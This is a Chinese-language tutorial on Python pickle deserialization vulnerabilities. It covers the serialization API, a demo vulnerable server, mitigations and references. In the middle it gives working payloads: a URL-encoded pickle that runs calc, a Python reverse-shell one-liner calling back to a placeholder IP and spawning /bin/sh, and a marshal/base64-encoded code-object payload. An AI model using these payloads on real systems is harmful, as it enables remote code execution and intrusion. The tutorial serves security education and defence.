Python中有两个模块可以实现对象的序列化,pickle和cPickle,区别在于cPickle是用C语言实现的,pickle是用纯python语言实现的,用法类似,cPickle的读写效率高一些。使用时一般先尝试导入cPickle,如果失败,再导入pickle模块。
pickle的应用场景一般有以下几种:
1) 在解析认证token,session的时候;
(尤其web中使用的redis、mongodb、memcached等来存储session等状态信息)
2) 将对象Pickle后存储成磁盘文件;
3)将对象Pickle后在网络中传输。
pickle 具有两个重要的函数:
1)一个是dump(), 作用是接受一个文件句柄和一个数据对象作为参数,把数据对象以特定的格式保存到给定的文件中;
2)另一个函数是load(),作用是从文件中取出已保存的对象,pickle 知道如何恢复这些对象到他们本来的格式。
使用方式如下:
pickle.dump(obj, file, protocol=None, *, fix_imports=True) //输出为文件对象
pickle.dumps(obj, protocol=None, *, fix_imports=True) //输出为 bytes 对象
pickle.load(file) // load参数是文件句柄
pickle.loads(file) // loads参数是字符串
1) 写一个最简单的demo环境,用户输入文件后使用pickle.load方法进行反序列化:
2) 生成payload,定义执行calc命令的类,使用dumps方法进行序列化并输出到poc.pickle中:
3) 执行此payload:
4) 模拟实现一个更为真实的web环境,取路径中的参数后使用cPickle.loads方法反序列化:
5) 将刚才生成的payload进行url编码,请求:
http://127.0.0.1:8000/?payload=cnt%0Asystem%0Ap1%0A(S%27calc%27%0Ap2%0AtRp3%0A.
将上述的calc改为下面的字符串可实现反弹shell:
python-c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xxx.xxx.xxx.xxx",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
这种通过-c参数只能执行相对简单的代码,如果出现了一些自定义函数,要序列化的对象就成了code类型。
但是pickle不能序列化code对象,这里简单测试一下:将要执行的代码都写到一个函数里foo(),尝试反序列化代码对象:
问题解决:从python2.6起,包含了一个可以序列化code对象的模块Marshal。由于python可以在函数当中再导入模块和定义函数,故可以将自己要执行的代码都写到一个函数foo()里:
得到payload:
http://127.0.0.1:8000/?payload=ctypes%0AFunctionType%0A%28cmarshal%0Aloads%0A%28cbase64%0Ab64decode%0A%28S%27YwAAAAABAAAAAgAAAAMAAABzOwAAAGQBAGQAAGwAAH0AAIcAAGYBAGQCAIYAAIkAAGQDAEeIAABkBACDAQBHSHwAAGoBAGQFAIMBAAFkAABTKAYAAABOaf////9jAQAAAAEAAAAEAAAAEwAAAHMsAAAAfAAAZAEAawEAchAAfAAAU4gAAHwAAGQBABiDAQCIAAB8AABkAgAYgwEAF1MoAwAAAE5pAQAAAGkCAAAAKAAAAAAoAQAAAHQBAAAAbigBAAAAdAMAAABmaWIoAAAAAHMwAAAARDovb3RoZXIvUHl0aG9uX3NlYy9QaWNrbGVSQ0UvcGlja2xlX3BvY19nZW4wLnB5UgEAAAALAAAAcwYAAAAAAQwBBAFzCQAAAGZpYigxMCkgPWkKAAAAdAQAAABjYWxjKAIAAAB0AgAAAG9zdAYAAABzeXN0ZW0oAQAAAFIDAAAAKAAAAAAoAQAAAFIBAAAAczAAAABEOi9vdGhlci9QeXRob25fc2VjL1BpY2tsZVJDRS9waWNrbGVfcG9jX2dlbjAucHl0AwAAAGZvbwkAAABzCAAAAAABDAEPBA8B%27%0AtRtRc__builtin__%0Aglobals%0A%28tRS%27%27%0AtR%28tR.
国外文档:
http://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_WP.pdf
更多payload:
https://github.com/sensepost/anapickle
根据漏洞原理进行测试: 1)查找是否引入pickle/cPickle包;
2)若引入则查看并是否进行了pickle.load(param)或pickle.loads(param)操作;
3) 若参数输入可控,则可能存在反序列化漏洞,构造payload进行利用。
1) 确保反序列化对象不可控,且在传递前请进行签名或者加密,防止篡改和重播
2) 如果序列化数据存储在磁盘上,请确保不受信任的第三方不能修改、覆盖或者重新创建自己的序列化数据
3)将 pickle 加载的数据列入白名单,可使用官方推荐的find_class方法,使用白名单限制反序列化引入的对象
https://docs.python.org/3.7/library/pickle.html#pickle-restrict
http://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_WP.pdf
https://github.com/phith0n/code-breaking/tree/master/2018/picklecode
https://github.com/team-su/SUCTF-2019/tree/master/Misc/guess_game